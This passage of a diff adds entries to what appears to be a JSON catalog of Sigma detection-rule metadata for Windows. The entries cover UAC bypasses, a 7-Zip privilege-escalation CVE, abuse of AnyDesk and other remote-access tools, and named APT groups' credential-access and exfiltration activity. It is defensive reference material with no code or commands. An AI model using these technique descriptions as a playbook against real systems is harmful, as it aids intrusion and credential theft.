logger DLL hijack (UACMe 30)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_access_win_uac_bypass_wow64_logger.yml", + "level": "high", + "logsource.category": "process_access", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_uac_bypass_wow64_logger.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "value": "UAC Bypass Using WOW64 Logger DLL Hijack" + }, + { + "description": "7-Zip through 21.07 on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.", + "meta": { + "author": "frack113", + "creation_date": "2022/04/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_7zip_cve_2022_29072.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/kagancapar/CVE-2022-29072", + "https://twitter.com/kagancapar/status/1515219358234161153", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_cve_2022_29072.yml" + ], + "tags": [ + "cve.2022.29072" + ] + }, + "uuid": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", + "value": "Suspicious 7zip Subprocess" + }, + { + "description": "Detection of unusual child processes by different system processes", + "meta": { + "author": "Semanur Guneysu @semanurtg, oscd.community", + "creation_date": "2020/10/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_debug_privilege.yml", + "level": "high", + 
"logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_debug_privilege.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "d522eca2-2973-4391-a3e0-ef0374321dae", + "value": "Abused Debug Privilege by Arbitrary Parent Processes" + }, + { + "description": "Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.", + "meta": { + "author": "Sreeman", + "creation_date": "2020/09/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.t1112", + "attack.t1053" + ] + }, + "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549", + "value": "Abusing Windows Telemetry For Persistence" + }, + { + "description": "Accesschk is an access and privilege audit tool developed by SysInternal and often being used by attacker to verify privileges", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community, Nasreddine Bencherchali (modified)", + "creation_date": "2020/10/13", + 
"falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_accesschk_usage_after_priv_escalation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", + "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_accesschk_usage_after_priv_escalation.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", + "value": "Accesschk Usage To Check Privileges" + }, + { + "description": "Detects the use of Advanced IP Scanner. 
Seems to be a popular tool for ransomware groups.", + "meta": { + "author": "@ROxPinTeddy, Nasreddine Bencherchali", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate administrative use" + ], + "filename": "proc_creation_win_advanced_ip_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/", + "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_ip_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", + "value": "Advanced IP Scanner" + }, + { + "description": "Detects the use of Advanced Port Scanner.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2021/12/18", + "falsepositive": [ + "Legitimate administrative use", + "Tools with similar commandline (very rare)" + ], + "filename": "proc_creation_win_advanced_port_scanner.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_advanced_port_scanner.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046", + "attack.t1135" + ] + }, + "uuid": 
"54773c5f-f1cc-4703-9126-2f797d96a69d", + "value": "Advanced Port Scanner" + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_alternate_data_streams.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c", + "value": "Execute From Alternate Data Streams" + }, + { + "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_msi_spawned_cmd_powershell.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", + "value": "Always Install Elevated MSI Spawned Cmd And Powershell" + }, + { + "description": "Detects Windows Installer 
service (msiexec.exe) trying to install MSI packages with SYSTEM privilege", + "meta": { + "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "System administrator usage", + "Anti virus products" + ], + "filename": "proc_creation_win_always_install_elevated_windows_installer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_always_install_elevated_windows_installer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", + "value": "Always Install Elevated Windows Installer" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_anydesk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", + "value": "Use of Anydesk Remote Access Software" + }, + { + "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/28", + "falsepositive": [ + "Legitimate piping of the password to anydesk", + "Some FP could occure with similar tools that uses the same command line '--set-password'" + ], + "filename": "proc_creation_win_anydesk_piped_password_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/misbehaving-rats/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_piped_password_via_cli.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "value": "AnyDesk Inline Piped Password" + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. 
Which can be used by attackers to gain remote access.", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2021/08/06", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "filename": "proc_creation_win_anydesk_silent_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://support.anydesk.com/Automatic_Deployment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/20", + "falsepositive": [ + "Legitimate use of AnyDesk from a non-standard folder" + ], + "filename": "proc_creation_win_anydesk_susp_folder.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_susp_folder.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "value": "Use of Anydesk Remote Access Software from Suspicious Folder" + }, + { + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "meta": { + "author": "Andreas Hunkeler (@Karneades)", + "creation_date": "2022/02/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_actinium_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_actinium_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ] + }, + "uuid": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "value": "Scheduled Task WScript VBScript" + }, + { + "description": "This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. 
think tanks.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/12/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_apt29_thinktanks.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_apt29_thinktanks.yml" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1059.001" + ] + }, + "uuid": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "value": "APT29" + }, + { + "description": "Detects activity that could be related to Baby Shark malware", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_babyshark.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_babyshark.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003", + "attack.t1059.001", + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1218.005" + ] + }, + "uuid": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", + "value": "Baby Shark Activity" + }, + { + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_apt_bear_activity_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" + ] + }, + "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "value": "Judgement Panda Credential Access Activity" + }, + { + "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2019/10/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_bluemashroom.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bluemashroom.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", + "value": "BlueMashroom DLL Load" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_chafer_mar18.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "value": "Chafer Activity" + }, + { + "description": "Detects wmiexec vbs version execution by wscript or cscript", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/04/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_apt_cloudhopper.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_cloudhopper.yml" + ], + "tags": [ + "attack.execution", + "attack.g0045", + "attack.t1059.005" + ] + }, + "uuid": "966e4016-627f-44f7-8341-f394905c361f", + "value": "WMIExec VBS Script" + }, + { + "description": "Detects CrackMapExecWin Activity as Described by NCSC", + "meta": { + "author": "Markus Neis", + "creation_date": "2018/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_dragonfly.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control", + "https://attack.mitre.org/software/S0488/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_dragonfly.yml" + ], + "tags": [ + "attack.g0035", + "attack.credential_access", + "attack.discovery", + "attack.t1110", + "attack.t1087" + ] + }, + "uuid": 
"04d9079e-3905-4b70-ad37-6bdf11304965", + "value": "CrackMapExecWin" + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_elise.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor" + }, + { + "description": "Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_emissarypanda_sep19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965", + "https://twitter.com/cyb3rops/status/1168863899531132929", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_emissarypanda_sep19.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "9aa01d62-7667-4d3b-acb8-8cb5103e2014", + "value": "Emissary Panda Malware SLLauncher" + }, + { + "description": "Detects EmpireMonkey APT reported Activity", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/04/02", + "falsepositive": [ + "Very Unlikely" + ], + "filename": "proc_creation_win_apt_empiremonkey.yml", + "level": "critical", + "logsource.category": "process_creation", 
+ "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_empiremonkey.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "10152a7b-b566-438f-a33c-390b607d1c8d", + "value": "Empire Monkey" + }, + { + "description": "Detects a specific tool and export used by EquationGroup", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=", + "https://securelist.com/apt-slingshot/84312/", + "https://twitter.com/cyb3rops/status/972186477512839170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml" + ], + "tags": [ + "attack.g0020", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e", + "value": "Equation Group DLL_U Load" + }, + { + "description": "Detects Golden Chickens deployment method as used by Evilnum in report published in July 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_evilnum_jul20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", + "https://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_evilnum_jul20.yml" + ], + "tags": [ + "attack.defense_evasion", + 
"attack.t1218.011" + ] + }, + "uuid": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "value": "EvilNum Golden Chickens Deployment via OCX Files" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ] + }, + "uuid": "18739897-21b1-41da-8ee4-5b786915a676", + "value": "GALLIUM Artefacts" + }, + { + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "meta": { + "author": "Tim Burrell", + "creation_date": "2020/02/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gallium_sha1.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212", + "attack.command_and_control", + "attack.t1071" + ] + }, + 
"uuid": "440a56bf-7873-4439-940a-1c8a671073c2", + "value": "GALLIUM Sha1 Artefacts" + }, + { + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2022/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_gamaredon_ultravnc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf", + "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gamaredon_ultravnc.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" + ] + }, + "uuid": "871b9555-69ca-4993-99d3-35a59f9f3599", + "value": "Suspicious UltraVNC Execution" + }, + { + "description": "Detects tools and process executions as observed in a Greenbug campaign in May 2020", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_greenbug_may20.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_greenbug_may20.yml" + ], + "tags": [ + "attack.g0049", + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "3711eee4-a808-4849-8a14-faf733da3612", + "value": "Greenbug Campaign Indicators" + }, + { + "description": 
"Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ] + }, + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity" + }, + { + "description": "Detects Hurricane Panda Activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/03/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hurricane_panda.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.g0009", + "attack.t1068" + ] + }, + "uuid": "0eb2107b-a596-422e-b123-b389d5594ed7", + "value": "Hurricane Panda Activity" + }, + { + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "meta": { + 
"author": "Florian Roth", + "creation_date": "2019/02/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_judgement_panda_gtr19.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1003.001", + "attack.exfiltration", + "attack.t1560.001" + ] + }, + "uuid": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "value": "Judgement Panda Exfil Activity" + }, + { + "description": "Detects Registry modifications performed by Ke3chang malware in campaigns running in 2019 and 2020", + "meta": { + "author": "Markus Neis, Swisscom", + "creation_date": "2020/06/18", + "falsepositive": [ + "Will need to be looked for combinations of those processes" + ], + "filename": "proc_creation_win_apt_ke3chang_regadd.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ke3chang_regadd.yml" + ], + "tags": [ + "attack.g0004", + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "7b544661-69fc-419f-9a59-82ccc328f205", + "value": "Ke3chang Registry Key Modifications" + }, + { + 